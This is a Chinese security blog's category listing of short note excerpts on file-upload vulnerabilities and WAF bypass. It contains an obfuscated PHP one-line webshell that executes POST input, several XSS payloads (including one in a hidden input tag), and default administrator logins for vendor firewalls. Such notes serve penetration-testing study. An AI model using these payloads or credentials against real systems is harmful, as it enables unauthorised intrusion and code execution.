文件上传——漏洞笔记
摘要:一般文件上传的流程 前端选择文件,进行提交。 浏览器形成POST MultiPart报文发送到服务器。 服务器中间件接收到报文,解析后交给相关后端代码进行处理。 后端代码将上传的文件内容写入到临时文件中(PHP特有)。 写入到文件中,文件名为提交的文件名或以一定规则生成的文件名。 上传漏洞原理
阅读全文
posted @ 2021-05-18 11:15
随笔分类 - waf绕过
制作免杀一句话思路
摘要:函数替换 函数字符串拆分组合 自定义函数 回调函数 编码绕过 比如PHP <?php $a = base64_decode('YXNzZXh4'); $a = substr_replace($a,'rt',4); $a($_POST['x']); ?>
阅读全文
posted @ 2021-05-18 10:56
Hidden属性的input标签中XSS的触发方法
摘要:<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" /> 触发方法不同的浏览器不同,具体可参考https://www.w3school.com.cn/jsref/p
阅读全文
posted @ 2021-05-18 10:51
XSS过滤圆括号一些可执行的payload
摘要:<img src=1111111 onerror=alert(1)> <img src=1111111 onerror=javascript:alert(1)> <a href="javascript:alert(/1/)">axxx</a> <sv
阅读全文
posted @ 2021-05-18 10:38
各个厂商防火墙的初始账号及密码
摘要:天融信 登录地址 https://192.168.1.254 https://192.168.1.254:8080 用户名 superman 密码 talent 、 talent!23 技术支持热线 8008105119 联想网御 需要证书(最好IE浏览器登录) 登录地址 https://10.1.
阅读全文
posted @ 2021-05-18 10:35
浙公网安备 33010602011771号